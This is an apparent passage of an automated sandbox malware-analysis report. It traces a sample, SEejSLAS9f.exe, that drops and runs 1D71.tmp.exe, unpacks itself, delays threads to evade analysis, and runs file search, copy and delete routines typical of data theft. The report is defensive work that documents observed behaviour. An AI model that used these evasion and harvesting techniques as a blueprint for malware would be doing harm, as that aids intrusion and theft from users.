                    Source: unknownProcess created: C:\Users\user\Desktop\SEejSLAS9f.exe "C:\Users\user\Desktop\SEejSLAS9f.exe"
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeUnpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeUnpacked PE file: 0.2.SEejSLAS9f.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeUnpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB7B
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008E11BD push 00000003h; ret 0_2_008E11C1
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008DF412 push es; iretd 0_2_008DF423
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008E37CA pushad ; ret 0_2_008E37E6
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008DD91C pushad ; retf 0_2_008DD91D
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008E3948 push ecx; ret 0_2_008E3965
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008E0D1C pushad ; ret 0_2_008E0D44
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024809CD push ecx; ret 0_2_024809E0
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024A799F push esp; retf 0_2_024A79A7
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0248CE18 push ss; retf 0_2_0248CE1D
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0247FFF3 push ecx; ret 0_2_02480006
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024A7F9D push esp; retf 0_2_024A7F9E
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024A9DE8 pushad ; retf 0_2_024A9DEF
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009ED88C pushad ; retf 1_2_009ED88D
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F20F6 push ebp; iretd 1_2_009F2129
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F11EF push B35707CFh; iretd 1_2_009F12E3
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F11EF pushad ; iretd 1_2_009F1361
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F2BED push edx; iretd 1_2_009F2BFE
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F12E4 pushad ; iretd 1_2_009F1361
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009EF250 push ebx; ret 1_2_009EF2B5
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009F0270 push 00000032h; retf 1_2_009F0272
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02497B2C push ecx; ret 1_2_02497B3F
                    Source: SEejSLAS9f.exeStatic PE information: section name: .text entropy: 7.554746178588047
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.112133434971041
                    Source: 1D71.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.112133434971041
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeWindow / User API: threadDelayed 540Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeWindow / User API: threadDelayed 9441Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-64241
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-32666
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeAPI coverage: 5.2 %
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeAPI coverage: 3.8 %
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820Thread sleep count: 540 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820Thread sleep time: -389880s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820Thread sleep count: 9441 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820Thread sleep time: -6816402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02481EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02481EA7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0248CF47
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02483F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02483F27
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0247DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0247DFD7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02471807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02471807
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02471820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02471820
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02481827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02481827
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0248D8A7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0248E0B7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02485127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02485127
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0248E597
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_024933F7 GetSystemInfo,wsprintfA,1_2_024933F7
                    Source: Amcache.hve.7.drBinary or memory string: VMware
